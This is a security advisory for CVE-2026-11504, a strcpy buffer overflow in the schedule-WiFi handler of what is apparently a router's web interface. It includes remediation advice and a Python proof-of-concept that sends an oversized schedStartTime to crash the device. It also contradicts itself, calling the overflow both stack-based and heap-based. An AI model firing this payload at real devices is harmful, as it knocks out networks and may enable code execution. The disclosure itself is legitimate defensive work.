CVE-2026-11504

An attacker can remotely initiate an attack by manipulating the `schedStartTime` or `schedEndTime` arguments in a request to the `/goform/openSchedWifi` endpoint. The `setSchedWifi` function copies these user-controlled parameters into a fixed-size buffer using the `strcpy` function without any length validation. Providing an oversized string causes a stack-based buffer overflow, potentially leading to memory corruption, denial of service, or arbitrary code execution [ref_id=1].

The vulnerability resides in the `setSchedWifi` function, located within the `/goform/openSchedWifi` file. This function retrieves `schedStartTime` and `schedEndTime` parameters and uses the unsafe `strcpy` function to copy them into a heap-allocated buffer of only 25 bytes, leading to a buffer overflow [ref_id=1].

The advisory recommends using safe functions like `strncpy` instead of `strcpy` to prevent buffer overflows. Additionally, it suggests implementing strict validation for time-related strings to ensure they adhere to expected formats and do not exceed buffer capacity. Proper buffer management, ensuring sufficient memory allocation for all valid inputs, is also advised [ref_id=1]. The patch does not show specific code changes, but these remediation steps would address the vulnerability.

The following Python script demonstrates how to trigger the overflow by sending a crafted schedStartTime. ```python import requests

url = "http://192.168.15.142/goform/openSchedWifi"

payload = { 'schedWifiEnable' : b'1', 'schedStartTime': b'1500'*10000, # Oversized payload to trigger overflow 'schedEndTime': b'1', 'timeType': b'1', 'day': b'1' }

print(f"[*] Sending payload to {url}...") try: res = requests.post(url, data=payload, timeout=5) print(f"[+] Request completed, Status Code: {res.status_code}") except requests.exceptions.Timeout: print("[+] Success: Target crashed (Timeout).") ``` [ref_id=1]